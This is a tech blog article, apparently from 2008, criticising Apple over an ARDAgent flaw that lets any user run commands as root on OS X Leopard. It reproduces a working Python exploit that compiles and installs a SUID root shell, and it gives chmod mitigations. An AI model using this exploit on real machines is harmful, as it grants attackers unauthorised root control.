About | Buy Stuff | Industry Watch | Learning Curve | Products | Search | Twitter
Home » Industry WatchThe Technological) (» Hall of Monkeys) (» Heroes Banquet)

You're Root, Dude!

You're also toast, dude! Apple's Leopard OS has a gaping security hole the size of a crater.


Buy It

Try It

Apple have a gaping security hole the size of a crater in OS X 10.5 Leopard - and wouldn't you know? They don't think it's a big deal!

Where have we heard that one before? The Oompa Loompa hole? That stayed open for how many months/years? The Opener hole that stayed open for how many centuries? This might be another one.

The current security hole is a 'gaping' hole perhaps better described as a 'crater' because it effectively replaces 'sudo' as an authentication trampoline - except you don't have to authenticate anymore.

You just run anything you want as root, dude! And if somebody else does - you're toast, dude!

Python Demonstration

Sean Collins has put together a nifty script which demonstrates how easy it is to get the bread burning on Apple's 'rock solid foundation'. Basically what you're doing is creating the source code to a privilege escalation trampoline executable, getting GCC to build it, and then getting Apple to root-enable it. Doesn't get anywhere on 10.4 but works like a charm on 10.5.

#!/usr/bin/python

'''

Greets to Rix and 514

'''
import commands
payload="echo 'int main() { setuid(0); setgid(0); seteuid(0); system(\"/bin/sh -i\"); }' > /tmp/r00t.c"
buildcmd="gcc /tmp/r00t.c -o /tmp/r00ted"
escalate="osascript -e 'tell app \"ARDAgent\" to do shell script \
        \"chown root /tmp/r00ted; chmod 4777 /tmp/r00ted\"'"
print 'Building your shell', commands.getoutput(payload), commands.getoutput(buildcmd)
print commands.getoutput(escalate)

print "r00t is located at /tmp/r00ted"

ARD 3.2.1/3009915

The key to this crater is in Apple Remote Desktop for Leopard.

/System/Library/CoreServices/RemoteManagement/ARDAgent.app

ARDAgent is SUID root enabled and for 10.5 Leopard runs root commands like sudo - except sudo is clever and requires authentication and Apple's ARDAgent for Leopard doesn't give a damn.

'Someone needs to wake the hell up over there at Cupertino', writes Collins in the understatement of the century. But it's deeper than that: for the issue apparently has been known for almost a year - when Leopard was first introduced. But Apple - grab your flight bag - don't think it's a serious issue.

TS1448: 'Not a Cause for Concern'

Apple's TS1448 mentions the issue in passing.

Symptoms
The following messages may appear in the Disk Utility log window when repairing disk permissions.
/* * */
Warning: SUID file 'System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent' has been modified and will not be repaired.

Resolution
You can safely ignore these messages. They are accurate but not a cause for concern.

My Copy is Crap!

Don Sinclair reported the issue already back on 26 October 2007 - the same day Leopard was officially released!

It knocked my Keychain all to hell and every time I made a move, I had to type my password to get past the request window. It told me none of my certificates were trusted and there was no way I could alter them.

Even Mac Forums picked up on it - on the same day. Bad news travels fast.

I am getting this when repairing permissions : 'Warning: SUID file 'System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent' has been modified and will not be repaired.'

Doesn't look like permissions get fixed.

What can I do?

So What's the Big Deal?

This is the big deal. Run 10.5 Leopard and do exactly like it says in the picture below.

It runs really good from CLIX too.

The hole's in the ARDAgent executable.

/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/

It's set as SUID root.

Here's the same thing again with Rixstep's famous TMI so even Apple engineers can understand it.

All commands it runs will run as root. And version 3.2.1/3009915 doesn't stop AppleScript commands. So in effect you're bypassing the authentication your system would ordinarily require for your protection.

And that's certainly not the idea. Certainly not with a Rock Solid Foundation™.

The Cure

Run this command. This might mean your 'repair permissions' won't work correctly but if you'd been behaving you wouldn't be running that contraption in the first place.

sudo chmod 0555 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Or why not enjoy yourself and turn the security hole on itself?

osascript -e 'tell app "ARDAgent" to do shell script "chmod 0555 \
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"';

Kudos to Bk and JB for the elegant alternative solution.

See Also
Learning Curve: A Suggestion
Industry Watch: You're Root, Dude!
Industry Watch: You're Toast, Dude?
Learning Curve: The First Real Malware?
Learning Curve: Apple Redefine 'Epic FAIL'?
Industry Watch: It's Not New It Starts with 10.2
Apple Developer Connection: AppleScript Overview
Industry Watch: Huge, Crazy, Ridiculous OS X Security Hole
Apple Developer Connection: Apple Events Programming Guide

About | Buy Stuff | Industry Watch | Learning Curve | Products | Search | Twitter
Copyright © Rixstep. All rights reserved.